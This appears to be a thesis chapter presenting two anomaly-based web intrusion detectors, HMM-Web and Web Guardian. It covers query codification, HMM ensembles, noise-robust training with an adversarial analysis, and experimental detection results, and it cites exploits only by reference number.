Analogously, we studied and developed Web Guardian, an anomaly-based IDS
which may provide real-time counteractions. Web Guardian applies a novel
mechanism for protecting web services. It is strictly coupled with [Modsecurity], one
of the world's most popular open-source Web Application Firewalls. In such a way,
it substantially complements the rule-based approach of ModSecurity.3 Contrary
to previous work [Torrano et al. (2009)] [Krueger et al. (2010)], Web Guardian is
able to inspect any field of the web requests, even if they are carried through an
encrypted channel (i.e. HTTPS traffic). If an anomaly is found, depending on the
anomaly type, a specific counteraction is performed. Counteractions may be defined
according to the reliability of an anomaly type, so that the probability of affecting
legitimate traffic is minimal.

3 That is, Web Guardian provides additional protection against unknown attacks
(or attacks for which ModSecurity rules are not available).

Similarly to HMM-Web, Web Guardian is able to infer the normal profile of web
requests without supervision, explicitly coping with the presence of noise (attacks)
in the training set. Moreover, Web Guardian is a multi-model detection system.
This architecture may allow inferring the attack type from the raised anomalies,
which is important to provide more informative security reports with respect to
state-of-the-art anomaly detection systems. The idea is similar to those proposed
in [Robertson et al. (2006)] and [Bolzoni et al. (2009)].

4.3 HMM-Web
Our aim is detecting both simple and sophisticated attacks against each web
application that resides on a web server. Focusing on this goal, the IDS is composed
of a set of (independent) application-specific modules. Each module, composed
of multiple HMM ensembles, is trained using queries on a specific web application
and, during the operational phase, outputs a probability value for each query on
this web application. Furthermore, a decision module classifies each query as
suspicious (a possible attack) or legitimate, by applying a threshold to this
probability value. Thresholds are fixed independently for each application-specific
module.

The following sections provide details about (a) the feature extraction process,
(b) the application-specific modules, (c) the decision module and (d) the building of
HMM ensembles. Throughout these sections we will refer to fig. 4.1, which shows
the IDS processing for a search.php application, which could be used to
list publications of a certain category (cat attribute) containing a key-word (key
attribute). It may finally be useful to remark that in some works the term web
application is used to identify a set of executables/scripts that offers a certain
number of services (e.g. a search engine: main page, database interrogation, image
generation). For the sake of clarity, in the following we will refer to each program
or script which generates dynamic web content as a different web application.

4.3.1 Feature extraction

Web application queries are extracted from web server logs. In particular, we select
all requests whose method is GET and that receive a successful response (status
code 2xx, as described in [RFC 2616 (1999)]). Then, the web application and its
input query are obtained from the Uniform Resource Identifier (URI), by considering
the web server configuration and its URI parsing routine.

For a generic query, the sequence of attributes and, for each attribute, its
input string are extracted. Regarding the sequence of attributes, we consider each
attribute as a symbol of the sequence, as this is enough to detect anomalies either in
the order or in the presence of suspicious attributes. On the other hand, it is useful
to provide a more complex codification of attribute inputs w.r.t. the simple
extraction of the character sequence. By scrutinising attacks against web
applications [CVE], it is evident that, typically, non-alphanumeric characters have
higher relevance than alphanumeric characters when interpreting the meaning of
attribute inputs. Non-alphanumeric characters can be used as meta-characters, with
a special meaning, during the processing made by web applications. Thus, a
distinction between them (e.g. between / and -) is definitely necessary. On the
contrary, distinguishing between digits or between alphabetic letters is not useful to
detect input validation attacks. Consequently, we substitute every digit with the
symbol N and every letter with the symbol A, while all the other characters remain
the same. For example, the attribute value /dir/sub/1,2 becomes /AAA/AAA/N,N. The
obtained sequence of symbols is then processed by the HMM.
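A minimal Python sketch of this codification step follows; it is an illustration of the
rule just described, not the actual implementation used in HMM-Web:

def codify(value):
    # Digits collapse to 'N', letters to 'A'; all other characters are
    # kept unchanged, since non-alphanumeric characters typically act
    # as meta-characters and carry most of the semantics.
    out = []
    for ch in value:
        if ch.isdigit():
            out.append("N")
        elif ch.isalpha():
            out.append("A")
        else:
            out.append(ch)
    return "".join(out)

assert codify("/dir/sub/1,2") == "/AAA/AAA/N,N"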

4.3.2 Application-specific modules

As shown in fig. 4.1, each application-specific module consists of: (1) an HMM
ensemble which analyses the sequence of attributes (i.e. {cat, key}); (2) for each
attribute found in training queries, an HMM ensemble which analyses the input
sequence for that attribute (i.e. for cat, {N, N}; for key, {A, A, A})4. Thus, each
HMM ensemble models a different feature of the web application query. Our goal
is to detect an anomaly in any of these features of the query, because each can be
related to a different attack typology. To this end, we apply the minimum rule
to the HMM ensemble outputs.

4 Braces and commas are not part of the sequence; we use them just to represent it.

4.3.3 Decision module

For the aim of the following discussion, let us define, for a specific training set:

• M , the number of web applications.

• q(w_i), the set of queries for the i-th web application w_i, ∀i ∈ [1, M]; |q(w_i)| is
the number of queries for w_i.

• N = \sum_{j=1}^{M} |q(w_j)|, the total number of queries collected.

The decision module classifies a query as suspicious if its probability is under a
threshold; otherwise, the query is classified as legitimate.
Now, it is important to note that, for a certain web application, the basic
assumption that a considerable amount of its training queries is legitimate may not
be valid. The attacker may exploit web applications which are rarely interrogated by
users to perform some unauthorised action. For example, this is the case of
applications for testing/configuration purposes ([milw0rm], exploits: 6287, 6314, 6269,
5955). If such attacks are inside the training set, in the worst case we model only
instances of attack queries (instead of legitimate queries) for the web applications
involved.
To cope with this problem we consider the relative frequency of queries toward
each web application, freq(w_i) = |q(w_i)|/N. This frequency reflects how strong the
assumption is that the application's queries are actually legitimate: the higher this
frequency, the stronger the assumption. In the detection phase, the frequency
freq(w_i) represents an estimate of the probability of (a query on) the web
application w_i, and it is stored in a look-up table (fig. 4.1). If we expect an overall
fraction of attack queries α in the training set, it is equal to:

    \alpha = \frac{1}{N} \sum_{i=1}^{M} \alpha_i \cdot |q(w_i)|        (4.1)

where α_i is the fraction of suspicious training queries toward w_i. The simplest
solution may be α_i = α, that is, an equal fraction α of training queries is classified
as suspicious by each application-specific module. However, this setting does not
take into account how strong the assumption is that the training queries are really
legitimate.

Aiming at including this information, for each application-specific module S(w_i)
we fix a threshold t_i so that the value of α_i is in inverse proportion to freq(w_i).
In this case, in agreement with eq. 4.1, the α_i are given by

    \alpha_i = \frac{\alpha}{M \cdot freq(w_i)}, \quad \forall i \in [1, M]        (4.2)

It is easy to see that, with such a setting, the smaller the frequency of a web
application, the larger the fraction of its training queries classified as suspicious. In
other terms, the weaker the assumption that the web application's queries are
legitimate, the bigger the fraction of training queries classified as suspicious.

Thus, the α parameter is used to estimate the threshold t_i to be used in the
detection phase, as α can be considered an overall confidence factor for the
legitimacy of the training queries.
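As a worked example of eq. 4.2 (with purely illustrative numbers), consider three web
applications with very different query volumes; note that, weighted as in eq. 4.1, the
resulting α_i recombine to the overall α:

def alpha_i(alpha, M, freq_wi):
    # eq. 4.2: per-application fraction of training queries to be
    # classified as suspicious.
    return alpha / (M * freq_wi)

queries = {"search.php": 9000, "login.php": 900, "test.php": 100}  # |q(w_i)|
N, M, alpha = sum(queries.values()), len(queries), 0.01

for app, n in queries.items():
    print(app, round(alpha_i(alpha, M, n / N), 4))
# search.php 0.0037, login.php 0.037, test.php 0.3333: the rarer the
# application, the larger the fraction of its queries treated as suspicious.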

4.3.4 HMM building

We address only two out of the three basic problems for HMM: the Learning Problem
(during the training phase) and the Evaluation Problem (during the detection phase).
We use the well-known Baum-Welch algorithm to train the HMM [Rabiner (1989)]. As
the algorithm may find only a local maximum of the likelihood function (that is, the
HMM may model well only a subset of the training sequences), we use an ensemble of
HMM in order to better model the whole training set. Moreover, HMM performance
depends on parameters such as the number of states, the initial state, the symbol
emission matrix and the state transition matrix. As the estimation of the best
suited values of such HMM parameters is more art than science, the use of an
ensemble of HMM can counterbalance this lack of knowledge.

We set an equal number of states for each HMM inside an ensemble. This
number is equal to the average length of the training sequences, rounded up to the
nearest integer. Also, an effective length definition is used: the length of a sequence
is given by the number of different symbols in the sequence. For example, the
sequence {a, b, c, b, c} contains 3 different symbols, a, b and c; consequently, 3 is
the effective length of this sequence. As a consequence of this heuristic for fixing
the number of states, each state can be associated with an element of the analyzed
sequence, rather than with a particular state of the web application.
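The following sketch captures this heuristic (again as an illustration, not the
original code):

import math

def effective_length(seq):
    # Number of *different* symbols: ['a','b','c','b','c'] -> 3.
    return len(set(seq))

def num_states(training_seqs):
    # Average effective length of the training sequences, rounded up.
    avg = sum(effective_length(s) for s in training_seqs) / len(training_seqs)
    return math.ceil(avg)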

Both the state transition and the symbol emission matrices are randomly
initialised. Considering IDS performance, this choice seems reasonable. In fact,
our IDS consists of a large number of HMM, and using a priori knowledge of
the problem to model the structure of the matrices would be a time- and
effort-expensive task. Finally, we build the dictionary of symbols by extracting them
from the training sequences. HMM in the same ensemble use the same dictionary.

Attack Type     Exploit N.                                          Paper N.

SQL Injection   6512, 6510, 6502, 6490, 6469, 6467, 6465,           16, 174, 202, 215
                6449, 6336, 3490, 5507

XSS             2776, 2881, 2987, 3405, 3490, 4681, 4989, 6332      162, 173, 192

Table 4.1: Working exploits and some papers used as reference for the attacks inside
dataset A. Both exploits and papers can be looked up on the web site [milw0rm], in
the exploits and papers sections, respectively.

4.3.5 Fusion of HMM outputs

In principle, the best fusion rule for the HMM inside an ensemble is unknown.
However, it may be useful to refer to a theoretical analysis of the HMM outputs.
Given an input sequence s, the output of the i-th HMM m_i (out of K HMM) in the
ensemble can be written as p(s|m_i) = p(m_i|s) · p(s)/p(m_i).

We could set the same a priori probability for all models, that is, p(m_i) =
c, ∀i ∈ [1, K]. This is a reasonable assumption, as in principle all models
are equally valid. It is easy to see that, when using the maximum fusion rule
(output = max{p(s|m_i), i ∈ [1, K]}), the output is proportional to max{p(m_i|s), i ∈
[1, K]} (the term p(s) is a constant). So, using the maximum rule, we select the
model in the ensemble that best describes the analyzed sequence to compute the
probability of the sequence. This reasoning is in agreement with the original goal
of an HMM ensemble, that is, to exploit the diversity of multiple HMM to better
model the whole set of training sequences.
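The two fusion steps (maximum rule inside an ensemble, this section; minimum rule
across the ensembles of a module, Section 4.3.2) can be sketched as follows, with
score_fns standing in for the p(s|m_i) functions of trained HMM:

def ensemble_score(seq, score_fns):
    # Max rule: keep the likelihood of the HMM that best describes seq.
    return max(fn(seq) for fn in score_fns)

def module_score(query_features, ensembles):
    # Min rule: the query is as suspicious as its most anomalous
    # feature (attribute sequence or any attribute input).
    return min(
        ensemble_score(query_features[name], fns)
        for name, fns in ensembles.items()
    )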

4.3.6 Experiments
4.3.6.1 Dataset and performance evaluation

In order to test our IDS in a realistic scenario, we collected a dataset of queries from
a production web server of our Academic Institution. Let us call D this dataset. It
consists of more than 150,000 queries collected over a period of six months. The
queries are distributed over a total of 52 web applications. In particular, 24 of these
applications provide services for registered users, while the remaining 28 provide
public services. As D consists of a set of real requests from web server log files, it
may contain both normal and attack queries. Our first goal is to assess the IDS
performance in terms of false alarm rate and detection of attacks similar to those
which may be inside the training queries. To this end, each query inside D has been
labelled as attack or legitimate through a semiautomatic process, further described
in sec. 4.3.6.1. Furthermore, D has been split randomly into 5 parts (all containing
the same number of queries) in order to apply a 5-fold cross-validation. As we are
dealing with real traffic, each split of D will contain unknown attacks and, as a
consequence of the random sampling, we assume the percentage of attacks to be
the same in all five splits. Exploiting the labelling process, we evaluated both the
false positive rate (FPR) and the detection rate (DR) on D.

In order to evaluate the detection rate, we selected a set of attacks published
on [milw0rm] and used these as a basis to build a dataset (called A) of attacks
exploiting specific vulnerabilities of our set of applications. This dataset consists of
19 SQL Injection and 19 Cross-site Scripting (XSS) attacks, on a subset of 18 web
applications (see Table 4.1).

It is worth noting that, due to privacy issues and the problem formulation,
public datasets are not available. However, there are attacks, such as those referred
to in [Ingham et al. (2007)], that are related to known vulnerabilities of widely
deployed, open-source web applications. On the other hand, in practice, web
applications which manage critical information (e.g. public administration, home
banking) are typically highly customised and their source code is not public. This
also reflects our case, and it is the reason why the attacks inside A are derived from
well-known attacks, representing versions of them customised against the
applications in our set.

Attack queries inside dataset D. In order to distinguish between attacks and
legitimate queries in the training set, we exploit the IDS itself. As attack queries
are typically low in number w.r.t. legitimate queries, and their structure is typically
different (this is definitely evident from the working exploits in Table 4.1), we
expect that they will receive a lower probability than legitimate queries. In fact,
our experiments fully confirmed this behaviour. However, it may not be possible to
fully automate the labelling process without falling into error, simply because
dataset D may not contain enough information to do so.

Thus, for each web application w_i having a relatively high number of queries, we
identified (and labelled) attack queries inside the training set by manually inspecting
the queries which received the lowest probability. For web applications having a
relatively low number of queries, we inspected all training queries, because an attack
query might not receive a lower probability than a legitimate query (i.e. when the
majority of queries are attacks), as discussed in sec. 4.3. In spotting attack queries
inside D, we exploited additional information.

We assessed legitimate inputs through the links contained inside web pages, when
browsing as a typical user. Moreover, to spot attack queries, we exploited our
expertise regarding typical attacks and, where available, the corresponding output
generated by the web applications. In such a way, for each application w_i we
computed the corresponding fraction of attacks α_i* inside D.

Using this method, we found an overall fraction of attacks inside D equal to
α* = 0.995% (obtained from the α_i* according to eq. 4.1). These attacks were very
similar to each other and were mainly related to the injection of HTML code.

In addition, the plots in figure 4.2 confirm our intuition that the lower
the number of queries, the weaker the assumption that they are legitimate. In
fact, we observe that as the number of queries toward a certain application decreases,
the percentage of attacks among them tends to increase (about 10% of attacks for
the 9th application).

4.3.7 Results
In this section we summarise the experimental results when (1) a single HMM and (2)
multiple HMM are used to model a generic sequence. Our IDS was always able
to detect all attacks inside dataset A, so in the following we will focus our analysis
on the evaluation of FPR/DR on dataset D (average values over all splits).

Fig. 4.3 shows the performance of the proposed IDS for option (1), either
with the query codification used in [Kruegel et al. (2005) (a)] or with the proposed
codification. As we can see, the proposed query codification is very effective in
heavily reducing the false alarm rate. In particular, we computed IDS performance
for different values of α, as in real scenarios we cannot rely on a reliable estimation,
but only on raw estimates. On the other hand, at a small expense in terms of false
alarm rate, a positive value of α definitely enhances the detection rate of attacks.
It is evident that a precise value is not necessary: even with a relatively
large value, i.e. α ≈ 3% (we know that attacks amount to about α∗ ≈ 1%), we are
able both to detect 96% of attacks and to raise a fraction of false alarms lower than
1%. The point α = 0 identifies IDS performance when we are fully confident in the
legitimacy of the training queries, as in [Kruegel et al. (2005) (a)]. It is evident that,
for the proposed query codification, the lowest amount of false alarms is obtained
(about 0.4%), but a significant part (about 15%) of the attacks inside D cannot be
detected. However, it is fundamental to spot these attacks, as they may reveal
vulnerabilities in web applications which are currently being exploited.

The proposed codification is also advantageous in terms of learning time: just
168 minutes against 214 (on a computer with an Intel Core2 Duo 8100 CPU @ 2.1GHz,
2GB RAM, Linux O.S.). In any case, the learning time does not affect IDS performance,
as training is performed off-line.

The results obtained with a single HMM are compared with those obtained using
3, 5 and 7 HMM per ensemble in fig. 4.4. For small values of α, if the number
of HMM per ensemble increases, there is an improvement in performance. This is a
reasonable result, because using more models the IDS is able to better model the
information inside the training set. However, the improvement in performance is not
as large as we expected. This is because the proposed query codification (sec. 4.3.1),
which simplifies the learning task for HMM, reduces the advantages of modelling a
generic sequence using multiple HMM. In fact, in some preliminary experiments we
performed using the codification of [Kruegel et al. (2005) (a)], the performance
improvement of multiple HMM was larger. Moreover, as the value of α
increases, the four curves get closer to each other. This may be explained by noting
that increasing α can lead to a heavy modification of the thresholds (through a
complex relationship), which may overwhelm the advantages of a more thorough
computation of the query probability.

4.4 Web Guardian


Web Guardian adopts a multi-model approach to the detection of malicious web
requests. Multiple features are extracted from web requests and each one is modeled
separately. Web Guardian collects such features from a large set of web requests. A
substantial part of these requests may be considered legitimate, i.e. performed
by normal users during their browsing experience. However, a small part of these
requests may be performed for malicious purposes, e.g. by exploitation tools
controlled by miscreants. In order to cope with such noise, we present a general
learning framework which can be applied to every statistical model. This framework
allows for an automatic cleaning of the training set. The method is based
on a reasonable assumption: the noise is represented by outlier patterns. If this
is not the case, such noise cannot (significantly) affect the model selection phase,
provided that a substantial part of the patterns is representative of legitimate behavior.

Now, it is worth noting that this assumption may not be valid for all features.
Some features may not be present in all web requests. As an example, even if we
consider a large number of web requests (e.g. one million), it is possible that a
web application receives only a few queries (e.g. 3 queries). In the worst case, these
few queries may be performed by an attacker instead of a legitimate user. Thus,
it is important to keep track of the number of training samples for each model. This
number reflects how far the training set may be assumed to be representative of
legitimate behavior. As a consequence, it tells us something about the reliability of
the model output. On the other hand, an operator may inspect those features having
a very low number of training samples. Due to the relatively low number of such
samples, this is not an expensive task.

This Section is organized as follows. Section 4.4.1 presents the proposed learning
framework. In that Section we also outline the limits of the framework. Section 4.4.2
describes the general models we adopt to describe web traffic features. In Section
4.4.3 we present and motivate all the features which are currently employed by Web
Guardian. The key components of the architecture of Web Guardian are described
in Section 4.4.4. Then, in Section 4.4.5 we present some preliminary experimental
results. These results are very promising, and clearly highlight that Web Guardian
may significantly improve the security of web services. However, Web Guardian is
still a work in progress: we are improving it and studying new functionalities.
In Section 4.5 we discuss current limitations and future work.

4.4.1 General learning framework


In general, anomaly-based intrusion detection for computer systems may be formulated
as a one-class classification (a.k.a. outlier detection) task. This task needs
real data in order to build a model of the legitimate activity (target class) in
computer systems, and then spot every pattern not belonging to such a class, i.e. an
outlier (attack) pattern. To this end, it may be assumed that a substantial part of
the data collected from computer systems is related to legitimate activity, since outlier
patterns (noise) are typically rare events. However, the presence of outlier patterns
may not be avoided, because the size of the data set makes the manual labeling of
outlier patterns very difficult or expensive. Also, due to the complexity of the patterns,
well-known outlier detection techniques may not be suitable.
Unfortunately, outlier patterns may significantly affect the classifier's performance
during the operational phase [Cretu et al. (2008)]. Moreover, such outlier patterns
might be deliberately generated by an adversary [Barreno et al. (2006)]. In this case
we refer to adversarial learning, since such malicious outlier patterns are aimed at
introducing persistent classification errors.
In this section, we present a general learning framework that may be applied
to every statistical model, including all the general models employed by Web Guardian.
The algorithm provides for an automatic filtering of noise inside the training set.
Furthermore, we study the limits of our framework, by defining the necessary conditions
that noisy patterns must meet to introduce errors in the target (legitimate)
class model.

4.4.1.1 Algorithm

Let us consider a training set SN = {x1, x2, . . . , xN} composed of N patterns. A
probabilistic model m is built using the entire set SN. Let p[X = x|m] be the
likelihood assigned by the model m to the pattern x ∈ SN. The training set can be
expressed as SN = TR ∪ OW, where TR is the set of the (R) target patterns, OW
is the set of the (W) outlier patterns, and N = R + W.
Let the index i be such that p[X = xi|m] ≥ p[X = xi+1|m], i = 1, . . . , N − 1. We
obtain a monotonically decreasing function f(i) = p[X = xi|m] which represents
the likelihood value of the i-th pattern.
Under the assumption that the majority of patterns inside SN are target patterns
(R ≫ W, for example R > 10W), and since outlier patterns have some different
characteristics (i.e. feature values) w.r.t. target patterns (otherwise, they could not
be considered as outliers), the expected outcome is

p[X = xt|m] > p[X = xo|m]  ∀xo ∈ OW, ∀xt ∈ TR  (4.3)

i.e. target patterns have higher likelihood than outlier patterns. If condition
(4.3) is satisfied, then there exists an index R such that TR = {x1, x2, . . . , xR} and
OW = {xR+1, xR+2, . . . , xN}. Thus, the goal of one-class classification is to find
the value of R (which is unknown) in order to separate target patterns from outlier
patterns. Now, let us define the relative distance measure δ between two patterns xj
and xk as δ(xj, xk) = |f(j) − f(k)|. In agreement with the notion of one-class
classification, the distance δ between a target pattern and an outlier pattern is
expected to be higher than the distance δ between any two consecutive target
patterns (or any two consecutive outlier patterns). This means that index R should
satisfy:

δ(xR, xR+1) > δ(xj, xj+1)  ∀j ≠ R, j ∈ [1, N)  (4.4)

It is interesting to note that the distance measure δ(xj, xj+1) may be viewed
as a particular version of the well-known Local Outlier Factor (LOF) of
xj+1 [Breunig et al. (2000)].

If conditions (4.3) and (4.4) are satisfied, R∗ = R is the index j for which the
distance δ(xj, xj+1) is maximum, i.e., R∗ = arg maxj {δ(xj, xj+1)}, j ∈ [1, N). Of
course, we must validate the obtained value R∗, by verifying that R∗ ≫ W∗, where
W∗ = N − R∗. At this point a new model m′ may be trained using only the patterns
x1, . . . , xR∗. If the condition R∗ ≫ W∗ does not hold, we may set an ad-hoc flag to
signal this exception. An operator may further inspect the training patterns near the
threshold R∗, to better understand the cause of the exception (e.g. it may be due
to a relatively low number of training samples).
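
For concreteness, the following minimal Python sketch implements the filtering step
just described (the function and parameter names are ours; the validation uses the
R > 10W example mentioned above):

import numpy as np

def filter_training_set(patterns, likelihoods, min_ratio=10):
    """Sort patterns by decreasing likelihood (the function f(i) in the
    text), cut at the largest gap between consecutive likelihoods to get
    R*, and validate that R* >> W* before keeping the filtered set."""
    order = np.argsort(likelihoods)[::-1]         # decreasing likelihood
    f = np.asarray(likelihoods, dtype=float)[order]
    gaps = np.abs(np.diff(f))                     # delta(x_j, x_{j+1})
    r_star = int(np.argmax(gaps)) + 1             # index of the largest gap
    w_star = len(patterns) - r_star
    flagged = r_star < min_ratio * w_star         # exception: R* >> W* fails
    kept = [patterns[i] for i in order[:r_star]]  # patterns for the new model m'
    return kept, r_star, flagged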

4.4.1.2 Adversarial analysis of the algorithm

An adversary could produce well-crafted traffic so that noisy patterns are generated
and either condition (4.3) or condition (4.4) is violated. If this happens, the system may
behave incorrectly, as outliers can be considered as targets (missed detections), or
targets may be considered as outliers (false alarms). In this section we express this
situation in terms of the a-posteriori probability of the model m, given such noisy
patterns.

Violation of condition (4.3) The a-priori probabilities for outlier and target
patterns can be estimated as p[X = xo] = W/(W + R) and p[X = xt] = R/(W + R),
respectively. Thus, applying the Bayes theorem, it is easy to see that the adversary
may attack the constraint in eq. (4.3) by submitting at least one outlier pattern xo
for which the model m has the following a-posteriori probability:

p[M = m|xo] ≥ (R/W) · min_{xt∈TR} p[M = m|xt].  (4.5)

In such a case, the pattern xo is considered as a target (missed detection). It is
clear that the adversary has two ways to achieve this condition: (a) increase the
number W of outlier patterns w.r.t. the number of target patterns R; (b) increase
p[M = m|xo] w.r.t. min_{xt∈TR} p[M = m|xt].
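
As a hypothetical numeric illustration (the figures are ours, not drawn from the
experiments): with R = 1,000 target patterns and W = 10 outliers, condition (4.5)
requires p[M = m|xo] ≥ 100 · min_{xt∈TR} p[M = m|xt], i.e. the injected outlier must
appear two orders of magnitude more typical than the least typical target pattern. By
injecting 100 outliers instead of 10, the adversary lowers this factor from 100 to 10,
which shows how strategies (a) and (b) can be combined.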

Violation of condition (4.4) Given that constraint (4.3) is satisfied, the system
may behave incorrectly if R∗ > R (Case I), i.e. outliers may be considered as targets
(missed detections), or if R∗ < R (Case II), i.e. targets may be considered as outliers
(false alarms).

Case I. R∗ > R There exists an index j such that the distance δ between two
consecutive outlier patterns is higher than the distance between patterns xR and
xR+1. In order to achieve Case I, the adversary has to submit outlier patterns with
different characteristics (otherwise, δ(xj, xj+1) = 0, ∀j ∈ [R + 1, N − 1]). Applying
the Bayes theorem, it is easy to see that Case I is possible only if

p[M = m|xR+1] > (R/2W) · p[M = m|xR]  (4.6)

This condition is less restrictive than condition (4.5).

Case II. R∗ < R There exists an index j such that the distance δ between two
consecutive target patterns is higher than or equal to the distance between patterns
xR and xR+1. Applying the Bayes theorem, it is easy to see that, in order to achieve
Case II, the adversary must generate at least one noisy pattern xo, for which:

p[M = m|xo] ≥ (R/W) · (p[M = m|xR] − φ)  (4.7)

where φ = max{p[M = m|xi] − p[M = m|xi+1]}, i ∈ [1, R). Recall that, if condition
(4.3) is satisfied, p[M = m|xR] = min_{xt∈TR} p[M = m|xt]. It is worth noting that
condition (4.7) is easier to achieve w.r.t. condition (4.5).
The value of φ in some sense quantifies how much target patterns are dissimilar
from each other. The higher the value of φ, the easier it is for an adversary to achieve
the attack condition (4.7). On the other hand, in general, the lower the value of φ,
the more similar the feature values of target patterns, and the more difficult it is for
an adversary to violate conditions (4.3) and (4.4), because min_{xt∈TR} p[M = m|xt]
should increase. For this reason, a robust solution for one-class learning may be
based on MCS, where each (one-class) classifier of the ensemble is trained using a
set of features showing similar values over target patterns (i.e. low values of φ).

4.4.2 General models


Web Guardian currently employs three general models. These models, enumerated
as A, B, C, are described in the following Sections. Subsequently, we describe the
association between features and general models.
The same general model may be applied to infer the statistical profile of different
features. Depending on the extracted feature f, we may have a different number of
raw training samples N(f). Since we apply the learning framework of Section 4.4.1
to each model, a small portion of N will be discarded. So, at the end of the training
phase, each model outputs the actual number of employed training samples
(i.e. R∗, see Section 4.4.1), as well as a probability threshold. This threshold is such
that all employed training samples are recognized as legitimate. For each model, we
keep track of R∗ as a reference index to evaluate its reliability.

4.4.2.1 Model A: sequence of symbols

Training This model is built from a training set SN = {x1, x2, . . . , xN}, where
each element is a sequence of symbols xi = [xi^1, xi^2, . . . , xi^l] (l = l(i) is the length of
the i-th sequence). A sequence of symbols is described through a Hidden Markov
Model, according to the discussion in Section 4.3.4. We employ a single model, since
the experiments in Section 4.3.7 showed that an HMM ensemble attains only
a small performance improvement (in spite of an increased learning time). As in
HMM-Web, this model is built using the Baum-Welch algorithm [Rabiner (1989)].
Both the state transition and the symbol emission matrices are randomly initialised.
The dictionary of symbols is the overall set of distinct symbols encountered in the
training sequences. The number of states is given by the average number of unique
symbols per sequence in the training set, rounded up to the nearest integer.

We train the HMM on the (raw) training set SN. Then, in order to cope with
training set noise, we apply the algorithm described in Section 4.4.1.1. At the end
of this phase, a probability threshold for the model is set. This threshold is given by
the minimum probability among those assigned to the (deemed as) legitimate sequences
within the training set SN.

Detection Given an observed sequence x, we obtain the most probable state
sequence using the Viterbi algorithm, as explained in [Rabiner (1989)]. Then,
the probability of the sequence, p[x is legitimate|model-a], is given by combining the
state transition and symbol emission matrices, according to the most probable state
sequence and the sequence of symbols under analysis.
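
As an illustration, the following Python sketch mimics model A using a recent
version of the hmmlearn library (which provides CategoricalHMM) as a stand-in for
our own Baum-Welch implementation; the library choice and all names are ours,
not part of Web Guardian:

import numpy as np
from hmmlearn import hmm

def train_model_a(sequences):
    """sequences: list of lists of integer symbol indices, one per sample."""
    n_symbols = max(max(s) for s in sequences) + 1
    # states: average number of unique symbols per sequence, rounded up
    n_states = int(np.ceil(np.mean([len(set(s)) for s in sequences])))
    X = np.concatenate(sequences).reshape(-1, 1)
    lengths = [len(s) for s in sequences]
    model = hmm.CategoricalHMM(n_components=n_states, n_features=n_symbols,
                               n_iter=50, init_params="ste")  # random init
    model.fit(X, lengths)  # Baum-Welch training
    return model

def score_sequence(model, seq):
    """Log-likelihood of a sequence along its most probable (Viterbi) path."""
    logprob, _states = model.decode(np.asarray(seq).reshape(-1, 1),
                                    algorithm="viterbi")
    return logprob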

4.4.2.2 Model B: statistical distribution of a numeric value

Training This model is built from a training set SN = {x1, x2, . . . , xN}, where
each element is a non-negative integer value (xi ∈ N, xi ≥ 0). In general, the
higher xi, the higher the likelihood that it represents an outlier (attack). This
property allows us to employ a slightly modified version of the algorithm in Section
4.4.1.1, which speeds up the noise filtering process. In practice, we redefine the index
i so that xi ≤ xi+1 ∀i ∈ [1, N − 1] (i.e. pattern values are in ascending order).
Then, we find the index (if multiple values of R∗ are found, we select the lowest one):

R∗ = arg max_{i∈[1,N−1]} δ(xi, xi+1), where δ(xi, xi+1) = |xi − xi+1|.  (4.8)

This index reflects the number of (deemed as) legitimate patterns in the training
set. As described in Section 4.4.1.1, the index R∗ is validated by verifying that
R∗ ≫ W∗, where W∗ = N − R∗. After this step, the new (filtered) training set
becomes SR∗ = {x1, x2, . . . , xR∗}. If the condition R∗ ≫ W∗ fails, an ad-hoc flag is
set, in order to signal this exception to an operator. The operator may further
inspect the training patterns having index close to R∗ to understand the origin of this
exception.

The model is based on the mean µ = (1/R∗) ∑_{i∈[1,R∗]} xi and the variance
σ² = (1/(R∗ − 1)) ∑_{i∈[1,R∗]} (xi − µ)² of the values inside SR∗. Using these parameters,
we compute the probability of the maximum value within the set SR∗ (see the next
paragraph). This will be the probability threshold of the model.

Detection During the detection phase, the probability of a certain value x is given
by (since large values should receive lower likelihood, we compute the probability
that the random variable X, having mean µ and variance σ², exceeds the value x):

p[x is legitimate|model-b] = p[|X − µ| ≥ |x − µ|] = σ²/(x − µ)²  if x ≥ µ + σ
p[x is legitimate|model-b] = 1  otherwise
(4.9)

This equation is obtained from the well-known Chebyshev inequality:

p[|X − µ| ≥ q] ≤ σ²/q²

with q = x − µ, considering the upper bound for p[|X − µ| ≥ |x − µ|]. Moreover,
since p[|X − µ| ≥ |x − µ|] ≤ 1, it follows that the Chebyshev inequality should be
used only when x ≥ µ + σ. The same model is used in [Kruegel et al. (2005) (a)].
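
A compact Python sketch of model B under these definitions follows (the names
and the factor-of-ten validation are ours):

import numpy as np

def score_model_b(x, mu, sigma2):
    # Chebyshev-based probability of eq. (4.9)
    if x >= mu + np.sqrt(sigma2):
        return sigma2 / (x - mu) ** 2
    return 1.0

def train_model_b(values, min_ratio=10):
    # Sort values in ascending order and cut at the largest gap (eq. 4.8);
    # np.argmax returns the lowest index on ties, as required.
    x = np.sort(np.asarray(values, dtype=float))
    gaps = np.diff(x)
    r_star = int(np.argmax(gaps)) + 1
    flagged = r_star < min_ratio * (len(x) - r_star)   # R* >> W* check
    kept = x[:r_star]
    mu, sigma2 = kept.mean(), kept.var(ddof=1)         # mean and variance
    threshold = score_model_b(kept.max(), mu, sigma2)  # prob. of max kept value
    return mu, sigma2, threshold, flagged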

4.4.2.3 Model C: statistical distribution of symbols

Training This model is built from a training set SN = {x1, x2, . . . , xN}, where each
element is a symbol. We extract the set of all distinct symbols Ω = {ω1, ω2, · · · , ωK}
in the training set. For each distinct symbol ωi, we count its number of occurrences
count(ωi) in the training set. Occurrences are stored in the set O =
{count(ω1), count(ω2), · · · , count(ωK)}. The lower the number of occurrences of a
symbol in the training set, the higher the likelihood that such a symbol represents an
outlier. Analogously to model B, in order to speed up the training process, for this
model we employ an ad-hoc version of the algorithm in Section 4.4.1.1. Let the index j
be such that count(ωj) ≥ count(ωj+1) ∀j ∈ [1, K − 1]. We find the index (if multiple
values of R∗ are found, we select the lowest one):

R∗ = arg max_{j∈[1,K−1]} δ(ωj, ωj+1), where δ(ωj, ωj+1) = |count(ωj) − count(ωj+1)|.
(4.10)

This index reflects the number of unique symbols (deemed as) legitimate in the
training set. The index R∗ is validated by verifying that

∑_{j≤R∗} count(ωj) ≫ ∑_{j>R∗} count(ωj).  (4.11)

That is, we verify that the great majority of symbols in the training
set is assumed as legitimate. After this step, we consider only symbols
having index lower than or equal to R∗: Ωnew = {ω1, ω2, · · · , ωR∗}, Onew =
{count(ω1), count(ω2), · · · , count(ωR∗)}. Then, the probability of each distinct symbol
ωi is given by its relative frequency:

p[x is legitimate|model-c] = count(ωi) / ∑_{j∈[1,R∗]} count(ωj)  (4.12)

